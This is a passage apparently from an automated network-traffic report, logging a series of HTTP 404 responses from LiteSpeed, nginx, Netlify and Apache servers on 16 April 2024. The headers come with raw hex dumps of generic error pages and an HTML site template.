            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Tue, 16 Apr 2024 09:59:23 GMTserver: LiteSpeedvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 16 Apr 2024 10:00:08 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: *Access-Control-Allow-Headers: Content-Type,Access-Token,Appid,Secret,Authorization,TokenContent-Encoding: gzipData Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 140
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 16 Apr 2024 10:00:11 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: *Access-Control-Allow-Headers: Content-Type,Access-Token,Appid,Secret,Authorization,TokenContent-Encoding: gzipData Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 140
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 16 Apr 2024 10:00:14 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: *Access-Control-Allow-Headers: Content-Type,Access-Token,Appid,Secret,Authorization,TokenContent-Encoding: gzipData Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 140
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 16 Apr 2024 10:00:18 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: *Access-Control-Allow-Headers: Content-Type,Access-Token,Appid,Secret,Authorization,TokenData Raw: 30 0d 0a 0d 0a Data Ascii: 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlDate: Tue, 16 Apr 2024 10:00:51 GMTServer: NetlifyX-Nf-Request-Id: 01HVK5M9C7DRX0A3PMYF6BG4XBConnection: closeTransfer-Encoding: chunkedData Raw: 39 64 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 3c 74 69 74 6c 65 3e 53 69 74 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 7b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 3a 23 41 33 41 39 41 43 3b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 43 61 72 64 3a 23 32 44 33 42 34 31 3b 2d 2d 63 6f 6c 6f 72 42 67 41 70 70 3a 72 67 62 28 31 34 2c 20 33 30 2c 20 33 37 29 3b 2d 2d 63 6f 6c 6f 72 42 67 49 6e 76 65 72 73 65 3a 68 73 6c 28 31 37 35 2c 20 34 38 25 2c 20 39 38 25 29 3b 2d 2d 63 6f 6c 6f 72 54 65 78 74 4d 75 74 65 64 3a 72 67 62 28 31 30 30 2c 20 31 31 30 2c 20 31 31 35 29 3b 2d 2d 63 6f 6c 6f 72 45 72 72 6f 72 3a 23 44 33 32 32 35 34 3b 2d 2d 63 6f 6c 6f 72 42 67 43 61 72 64 3a 23 66 66 66 3b 2d 2d 63 6f 6c 6f 72 53 68 61 64 6f 77 3a 23 30 65 31 65 32 35 31 66 3b 2d 2d 63 6f 6c 6f 72 45 72 72 6f 72 54 65 78 74 3a 72 67 62 28 31 34 32 2c 20 31 31 2c 20 34 38 29 3b 2d 2d 63 6f 6c 6f 72 43 61 72 64 54 69 74 6c 65 43 61 72 64 3a 23 32 44 33 42 34 31 3b 2d 2d 63 6f 6c 6f 72 53 74 61 63 6b 54 65 78 74 3a 23 32 32 32 3b 2d 2d 63 6f 6c 6f 72 43 6f 64 65 54 65 78 74 3a 23 46 35 46 35 46 35 7d 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 73 65 67 6f 65 20 75 69 2c 52 6f 62 6f 74 6f 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 2c 61 70 70 6c 65 20 63 6f 6c 6f 72 20 65 6d 6f 6a 69 2c 73 65 67 6f 65 20 75 69 20 65 6d 6f 6a 69 2c 73 65 67 6f 65 20 75 69 20 73 79 6d 62 6f 6c 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 33 34 33 38 33 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 7d 68 31 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 37 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 2e 6d 61 69 6e 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 77 69 64 74 68 3a 31 30 30 76 77
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlDate: Tue, 16 Apr 2024 10:00:53 GMTServer: NetlifyX-Nf-Request-Id: 01HVK5MBYG15N8ZTVMHJ1MWWT5Connection: closeTransfer-Encoding: chunkedData Raw: 39 64 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 3c 74 69 74 6c 65 3e 53 69 74 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 7b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 3a 23 41 33 41 39 41 43 3b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 43 61 72 64 3a 23 32 44 33 42 34 31 3b 2d 2d 63 6f 6c 6f 72 42 67 41 70 70 3a 72 67 62 28 31 34 2c 20 33 30 2c 20 33 37 29 3b 2d 2d 63 6f 6c 6f 72 42 67 49 6e 76 65 72 73 65 3a 68 73 6c 28 31 37 35 2c 20 34 38 25 2c 20 39 38 25 29 3b 2d 2d 63 6f 6c 6f 72 54 65 78 74 4d 75 74 65 64 3a 72 67 62 28 31 30 30 2c 20 31 31 30 2c 20 31 31 35 29 3b 2d 2d 63 6f 6c 6f 72 45 72 72 6f 72 3a 23 44 33 32 32 35 34 3b 2d 2d 63 6f 6c 6f 72 42 67 43 61 72 64 3a 23 66 66 66 3b 2d 2d 63 6f 6c 6f 72 53 68 61 64 6f 77 3a 23 30 65 31 65 32 35 31 66 3b 2d 2d 63 6f 6c 6f 72 45 72 72 6f 72 54 65 78 74 3a 72 67 62 28 31 34 32 2c 20 31 31 2c 20 34 38 29 3b 2d 2d 63 6f 6c 6f 72 43 61 72 64 54 69 74 6c 65 43 61 72 64 3a 23 32 44 33 42 34 31 3b 2d 2d 63 6f 6c 6f 72 53 74 61 63 6b 54 65 78 74 3a 23 32 32 32 3b 2d 2d 63 6f 6c 6f 72 43 6f 64 65 54 65 78 74 3a 23 46 35 46 35 46 35 7d 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 73 65 67 6f 65 20 75 69 2c 52 6f 62 6f 74 6f 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 2c 61 70 70 6c 65 20 63 6f 6c 6f 72 20 65 6d 6f 6a 69 2c 73 65 67 6f 65 20 75 69 20 65 6d 6f 6a 69 2c 73 65 67 6f 65 20 75 69 20 73 79 6d 62 6f 6c 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 33 34 33 38 33 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 7d 68 31 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 37 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 2e 6d 61 69 6e 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 77 69 64 74 68 3a 31 30 30 76 77
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlDate: Tue, 16 Apr 2024 10:00:56 GMTServer: NetlifyX-Nf-Request-Id: 01HVK5MEGTM54BM3C6NFASF488Connection: closeTransfer-Encoding: chunkedData Raw: 39 64 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 3c 74 69 74 6c 65 3e 53 69 74 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 7b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 3a 23 41 33 41 39 41 43 3b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 43 61 72 64 3a 23 32 44 33 42 34 31 3b 2d 2d 63 6f 6c 6f 72 42 67 41 70 70 3a 72 67 62 28 31 34 2c 20 33 30 2c 20 33 37 29 3b 2d 2d 63 6f 6c 6f 72 42 67 49 6e 76 65 72 73 65 3a 68 73 6c 28 31 37 35 2c 20 34 38 25 2c 20 39 38 25 29 3b 2d 2d 63 6f 6c 6f 72 54 65 78 74 4d 75 74 65 64 3a 72 67 62 28 31 30 30 2c 20 31 31 30 2c 20 31 31 35 29 3b 2d 2d 63 6f 6c 6f 72 45 72 72 6f 72 3a 23 44 33 32 32 35 34 3b 2d 2d 63 6f 6c 6f 72 42 67 43 61 72 64 3a 23 66 66 66 3b 2d 2d 63 6f 6c 6f 72 53 68 61 64 6f 77 3a 23 30 65 31 65 32 35 31 66 3b 2d 2d 63 6f 6c 6f 72 45 72 72 6f 72 54 65 78 74 3a 72 67 62 28 31 34 32 2c 20 31 31 2c 20 34 38 29 3b 2d 2d 63 6f 6c 6f 72 43 61 72 64 54 69 74 6c 65 43 61 72 64 3a 23 32 44 33 42 34 31 3b 2d 2d 63 6f 6c 6f 72 53 74 61 63 6b 54 65 78 74 3a 23 32 32 32 3b 2d 2d 63 6f 6c 6f 72 43 6f 64 65 54 65 78 74 3a 23 46 35 46 35 46 35 7d 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 73 65 67 6f 65 20 75 69 2c 52 6f 62 6f 74 6f 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 2c 61 70 70 6c 65 20 63 6f 6c 6f 72 20 65 6d 6f 6a 69 2c 73 65 67 6f 65 20 75 69 20 65 6d 6f 6a 69 2c 73 65 67 6f 65 20 75 69 20 73 79 6d 62 6f 6c 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 33 34 33 38 33 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 7d 68 31 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 37 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 2e 6d 61 69 6e 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 77 69 64 74 68 3a 31 30 30 76 77
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlDate: Tue, 16 Apr 2024 10:00:59 GMTServer: NetlifyX-Nf-Request-Id: 01HVK5MH2VHJ14N108E9M8MFJMConnection: closeTransfer-Encoding: chunkedData Raw: 39 64 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 3c 74 69 74 6c 65 3e 53 69 74 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 7b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 3a 23 41 33 41 39 41 43 3b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 43 61 72 64 3a 23 32 44 33 42 34 31 3b 2d 2d 63 6f 6c 6f 72 42 67 41 70 70 3a 72 67 62 28 31 34 2c 20 33 30 2c 20 33 37 29 3b 2d 2d 63 6f 6c 6f 72 42 67 49 6e 76 65 72 73 65 3a 68 73 6c 28 31 37 35 2c 20 34 38 25 2c 20 39 38 25 29 3b 2d 2d 63 6f 6c 6f 72 54 65 78 74 4d 75 74 65 64 3a 72 67 62 28 31 30 30 2c 20 31 31 30 2c 20 31 31 35 29 3b 2d 2d 63 6f 6c 6f 72 45 72 72 6f 72 3a 23 44 33 32 32 35 34 3b 2d 2d 63 6f 6c 6f 72 42 67 43 61 72 64 3a 23 66 66 66 3b 2d 2d 63 6f 6c 6f 72 53 68 61 64 6f 77 3a 23 30 65 31 65 32 35 31 66 3b 2d 2d 63 6f 6c 6f 72 45 72 72 6f 72 54 65 78 74 3a 72 67 62 28 31 34 32 2c 20 31 31 2c 20 34 38 29 3b 2d 2d 63 6f 6c 6f 72 43 61 72 64 54 69 74 6c 65 43 61 72 64 3a 23 32 44 33 42 34 31 3b 2d 2d 63 6f 6c 6f 72 53 74 61 63 6b 54 65 78 74 3a 23 32 32 32 3b 2d 2d 63 6f 6c 6f 72 43 6f 64 65 54 65 78 74 3a 23 46 35 46 35 46 35 7d 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 73 65 67 6f 65 20 75 69 2c 52 6f 62 6f 74 6f 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 2c 61 70 70 6c 65 20 63 6f 6c 6f 72 20 65 6d 6f 6a 69 2c 73 65 67 6f 65 20 75 69 20 65 6d 6f 6a 69 2c 73 65 67 6f 65 20 75 69 20 73 79 6d 62 6f 6c 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 33 34 33 38 33 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 7d 68 31 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 37 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 2e 6d 61 69 6e 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 77 69 64 74 68 3a 31 30 30 76 77
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Apr 2024 10:01:04 GMTServer: ApacheContent-Length: 11834Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 47 69 74 61 6c 20 2d 20 44 69 67 69 74 61 6c 20 41 67 65 6e 63 79 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 69 63 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 57 65 62 20 46 6f 6e 74 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 48 65 65 62 6f 3a 77 67 68 74 40 34 30 30 3b 35 30 30 26 66 61 6d 69 6c 79 3d 4a 6f 73 74 3a 77 67 68 74 40 35 30 30 3b 36 30 30 3b 37 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 20 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 49 63 6f 6e 20 46 6f 6e 74 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 30 2e 30 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 40 31 2e 34 2e 31 2f 66 6f 6e 74 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 4c 69 62 72 61 72 69 65 73
